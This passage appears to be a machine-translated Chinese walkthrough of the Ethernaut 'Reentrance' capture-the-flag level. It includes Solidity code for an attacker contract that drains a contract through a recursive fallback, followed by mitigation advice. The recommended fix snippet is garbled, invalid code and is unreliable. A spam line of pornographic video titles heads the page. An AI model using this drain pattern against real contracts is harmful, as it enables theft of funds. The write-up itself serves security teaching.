日本黄色一级经典视频|伊人久久精品视频|亚洲黄色色周成人视频九九九|av免费网址黄色小短片|黄色Av无码亚洲成年人|亚洲1区2区3区无码|真人黄片免费观看|无码一级小说欧美日免费三级|日韩中文字幕91在线看|精品久久久无码中文字幕边打电话

當(dāng)前位置:首頁 > 物聯(lián)網(wǎng) > 區(qū)塊鏈
[導(dǎo)讀] 什么是重入攻擊? 重入攻擊發(fā)生在單線程計(jì)算環(huán)境中,當(dāng)執(zhí)行堆棧跳轉(zhuǎn)或調(diào)用子例程時(shí),在返回到原始執(zhí)行之前。 一方面,這種單線程執(zhí)行確保了智能合約的原子性,并消除了一些競爭條件。另一方

什么是重入攻擊?

重入攻擊發(fā)生在單線程計(jì)算環(huán)境中,當(dāng)執(zhí)行堆棧跳轉(zhuǎn)或調(diào)用子例程時(shí),在返回到原始執(zhí)行之前。

一方面,這種單線程執(zhí)行確保了智能合約的原子性,并消除了一些競爭條件。另一方面,合約容易受到執(zhí)行順序不佳的影響。

在上面的示例中,合同B是惡意合同,遞歸地調(diào)用A.withdraw()來耗盡合同A的資金。請(qǐng)注意,基金提取在合同A從其遞歸循環(huán)返回之前成功完成,甚至意識(shí)到B已經(jīng)提取出超過其自身余額的方式。

此Ethernaut級(jí)別利用此重入問題以及導(dǎo)致DAO黑客攻擊的以下其他因素:

· 任何人都可以調(diào)用Fallback函數(shù)并執(zhí)行惡意代碼

· 惡意外部合同可能會(huì)濫用提款權(quán)

1、創(chuàng)建一個(gè)名為Reenter.sol的惡意合同,該合同將首先捐贈(zèng)給Reentrance.sol,然后遞歸地從中退出,直到Reentrance耗盡資金。

contract Reenter {

Reentrance public original = Reentrance(YOUR_INSTANCE_ADDR);

uint public amount = 1 ether; //withdrawal amount each time

}

2、Reenter.sol和以太合約結(jié)構(gòu)相同

constructor() public payable {

}

3、創(chuàng)建公共函數(shù),以便reenter.sol可以向reentrance.sol捐款,并在其余額分類賬中注冊(cè)為捐贈(zèng)者:

funcTIon donateToSelf() public {

original.donate.value(amount).gas(4000000)(address(this));//need to add value to this fn

}

4、調(diào)用此函數(shù)將確保您的惡意合同至少可以調(diào)用withdraw()一次,即通過if(balances [msg.sender]》 = _amount)檢查。

上圖說明了Reenter.sol從Reentrance.sol中提取所有資金的遞歸循環(huán)。

讓我們?cè)诤贤珺中實(shí)現(xiàn)惡意回退功能,這樣當(dāng)合同A執(zhí)行msg.sender.call.value(_amount)()退還合同B時(shí),您的惡意合同會(huì)觸發(fā)更多的撤銷。

5、實(shí)現(xiàn)此惡意回退函數(shù):

funcTIon() public payable {

if (address(original).balance != 0 ) {

original.withdraw(amount);

}

}

最后,在Remix中:將您的合同部署到Ropsten,為其植入以太,捐贈(zèng)給Reentrance,然后調(diào)用Fallback函數(shù),從Reentrance中耗盡所有資金。

關(guān)鍵要點(diǎn):

· 執(zhí)行順序在Solidity中非常重要。如果你必須進(jìn)行外部函數(shù)調(diào)用,那就做你做的最后一件事(在所有必要的檢查和余額之后):

funcTIon withdraw(uint _amount) public {

if(balances[msg.sender] 》= _amount) {

balances[msg.sender] -= _amount;

if(msg.sender.transfer(_amount)()) {

_amount;

}

}

}

// Or even better, invoke transfer in a separate funcTIon

· 包括一個(gè)互斥以防止重入,例如 使用布爾鎖變量來指示執(zhí)行深度。

· 使用函數(shù)修飾符檢查不變量時(shí)要小心:修飾符在函數(shù)開頭執(zhí)行。 如果變量狀態(tài)將在整個(gè)函數(shù)期間發(fā)生變化,請(qǐng)考慮將修改器提取到放置在函數(shù)中正確行的檢查中。

· “使用轉(zhuǎn)移將資金從合同中轉(zhuǎn)出,因?yàn)樗鼤?huì)拋出并限制gas轉(zhuǎn)發(fā)。 調(diào)用和發(fā)送等低級(jí)函數(shù)只返回false,但是當(dāng)接收合同失敗時(shí)不會(huì)中斷執(zhí)行流程?!?/p>

本站聲明: 本文章由作者或相關(guān)機(jī)構(gòu)授權(quán)發(fā)布,目的在于傳遞更多信息,并不代表本站贊同其觀點(diǎn),本站亦不保證或承諾內(nèi)容真實(shí)性等。需要轉(zhuǎn)載請(qǐng)聯(lián)系該專欄作者,如若文章內(nèi)容侵犯您的權(quán)益,請(qǐng)及時(shí)聯(lián)系本站刪除。
換一批
延伸閱讀

LED驅(qū)動(dòng)電源的輸入包括高壓工頻交流(即市電)、低壓直流、高壓直流、低壓高頻交流(如電子變壓器的輸出)等。

關(guān)鍵字: 驅(qū)動(dòng)電源

在工業(yè)自動(dòng)化蓬勃發(fā)展的當(dāng)下,工業(yè)電機(jī)作為核心動(dòng)力設(shè)備,其驅(qū)動(dòng)電源的性能直接關(guān)系到整個(gè)系統(tǒng)的穩(wěn)定性和可靠性。其中,反電動(dòng)勢(shì)抑制與過流保護(hù)是驅(qū)動(dòng)電源設(shè)計(jì)中至關(guān)重要的兩個(gè)環(huán)節(jié),集成化方案的設(shè)計(jì)成為提升電機(jī)驅(qū)動(dòng)性能的關(guān)鍵。

關(guān)鍵字: 工業(yè)電機(jī) 驅(qū)動(dòng)電源

LED 驅(qū)動(dòng)電源作為 LED 照明系統(tǒng)的 “心臟”,其穩(wěn)定性直接決定了整個(gè)照明設(shè)備的使用壽命。然而,在實(shí)際應(yīng)用中,LED 驅(qū)動(dòng)電源易損壞的問題卻十分常見,不僅增加了維護(hù)成本,還影響了用戶體驗(yàn)。要解決這一問題,需從設(shè)計(jì)、生...

關(guān)鍵字: 驅(qū)動(dòng)電源 照明系統(tǒng) 散熱

根據(jù)LED驅(qū)動(dòng)電源的公式,電感內(nèi)電流波動(dòng)大小和電感值成反比,輸出紋波和輸出電容值成反比。所以加大電感值和輸出電容值可以減小紋波。

關(guān)鍵字: LED 設(shè)計(jì) 驅(qū)動(dòng)電源

電動(dòng)汽車(EV)作為新能源汽車的重要代表,正逐漸成為全球汽車產(chǎn)業(yè)的重要發(fā)展方向。電動(dòng)汽車的核心技術(shù)之一是電機(jī)驅(qū)動(dòng)控制系統(tǒng),而絕緣柵雙極型晶體管(IGBT)作為電機(jī)驅(qū)動(dòng)系統(tǒng)中的關(guān)鍵元件,其性能直接影響到電動(dòng)汽車的動(dòng)力性能和...

關(guān)鍵字: 電動(dòng)汽車 新能源 驅(qū)動(dòng)電源

在現(xiàn)代城市建設(shè)中,街道及停車場照明作為基礎(chǔ)設(shè)施的重要組成部分,其質(zhì)量和效率直接關(guān)系到城市的公共安全、居民生活質(zhì)量和能源利用效率。隨著科技的進(jìn)步,高亮度白光發(fā)光二極管(LED)因其獨(dú)特的優(yōu)勢(shì)逐漸取代傳統(tǒng)光源,成為大功率區(qū)域...

關(guān)鍵字: 發(fā)光二極管 驅(qū)動(dòng)電源 LED

LED通用照明設(shè)計(jì)工程師會(huì)遇到許多挑戰(zhàn),如功率密度、功率因數(shù)校正(PFC)、空間受限和可靠性等。

關(guān)鍵字: LED 驅(qū)動(dòng)電源 功率因數(shù)校正

在LED照明技術(shù)日益普及的今天,LED驅(qū)動(dòng)電源的電磁干擾(EMI)問題成為了一個(gè)不可忽視的挑戰(zhàn)。電磁干擾不僅會(huì)影響LED燈具的正常工作,還可能對(duì)周圍電子設(shè)備造成不利影響,甚至引發(fā)系統(tǒng)故障。因此,采取有效的硬件措施來解決L...

關(guān)鍵字: LED照明技術(shù) 電磁干擾 驅(qū)動(dòng)電源

開關(guān)電源具有效率高的特性,而且開關(guān)電源的變壓器體積比串聯(lián)穩(wěn)壓型電源的要小得多,電源電路比較整潔,整機(jī)重量也有所下降,所以,現(xiàn)在的LED驅(qū)動(dòng)電源

關(guān)鍵字: LED 驅(qū)動(dòng)電源 開關(guān)電源

LED驅(qū)動(dòng)電源是把電源供應(yīng)轉(zhuǎn)換為特定的電壓電流以驅(qū)動(dòng)LED發(fā)光的電壓轉(zhuǎn)換器,通常情況下:LED驅(qū)動(dòng)電源的輸入包括高壓工頻交流(即市電)、低壓直流、高壓直流、低壓高頻交流(如電子變壓器的輸出)等。

關(guān)鍵字: LED 隧道燈 驅(qū)動(dòng)電源
關(guān)閉